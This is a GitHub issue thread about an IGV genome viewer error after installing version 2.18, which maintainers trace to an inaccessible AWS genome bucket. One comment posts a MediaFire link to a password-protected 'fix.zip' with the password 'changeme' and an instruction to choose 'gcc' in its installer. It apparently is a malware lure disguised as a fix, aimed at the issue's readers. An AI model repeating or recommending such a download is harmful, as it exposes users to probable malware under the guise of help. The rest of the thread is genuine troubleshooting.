### ISSUE TITLE
Error Message after installing 2.18 version in windows. Error "Cannot invoke 'Java.io.bufferedreader.close()' because reader is null"

### ISSUE THREAD

**Issue by Jeevankumar404346** [igvteam/igv#1552]
Dear team,

We tried installing the packaging using the below link and after completion of installation, getting error message as shown in the below screenshot. Could you please help to fix the issue.

https://data.broadinstitute.org/igv/projects/downloads/2.18/IGV_Win_2.18.2-WithJava-installer.exe

Error Message after installing 2.18 version. Error "Cannot invoke 'Java.io.bufferedreader.close()' because reader is null"

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jeevankumar404346** [comment]
I am not able to download the file, is it a fix to the issue reported. can you confirm it.

**Comment by jrobinso** [comment]
@Jeevankumar404346 I do not understand your comment, download what file?  

There might be more information in your igv log file, located in the folder <user home>/igv.  The filename is usually "igv0.log".   It should show the stack trace which might help us identify the issue.   Can you zip and attach the log, or  paste the stack trace here?  If it contains sensitive information you can email it to igv-team@broadinstitute.org.

**Comment by jrobinso** [comment]
Is it possible you have a firewall or proxy blocking access to [https://igv-genepattern-org.s3.amazonaws.com/genomes/hg38/hg38.json](https://igv-genepattern-org.s3.amazonaws.com/genomes/hg38/hg38.json)?

**Comment by jbelsky** [comment]
Hi, can confirm I am running into the same issue with hg19 on IGV 2.17.4.  When I try to put the url in the browser I'm getting an `Access Denied`.
```
INFO [Sep 03,2024 14:19] [GenomeManager] Loading genome: https://s3.amazonaws.com/igv.org.genomes/hg19/hg19.json
SEVERE [Sep 03,2024 14:19] [MessageUtils] Error loading genome: hg19
SEVERE [Sep 03,2024 14:19] [MessageUtils] java.lang.NullPointerException: Cannot invoke "java.io.BufferedReader.close()" because "reader" is null
	at org.igv/org.broad.igv.feature.genome.load.JsonGenomeLoader.loadGenome(JsonGenomeLoader.java:72)
	at org.igv/org.broad.igv.feature.genome.GenomeManager.loadGenome(GenomeManager.java:197)
	at org.igv/org.broad.igv.feature.genome.GenomeManager.loadGenomeById(GenomeManager.java:171)
	at org.igv/org.broad.igv.ui.IGV$StartupRunnable.run(IGV.java:1933)
	at org.igv/org.broad.igv.util.LongRunningTask.call(LongRunningTask.java:72)
	at java.base/java.util.concurrent.FutureTask.run(Unknown Source)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
	at java.base/java.lang.Thread.run(Unknown Source)

SEVERE [Sep 03,2024 14:19] [MessageUtils] Error loading genome: hg19
```

**Comment by helgathorv** [comment]
@jbelsky There was an issue with the AWS bucket. It has been resolved now.
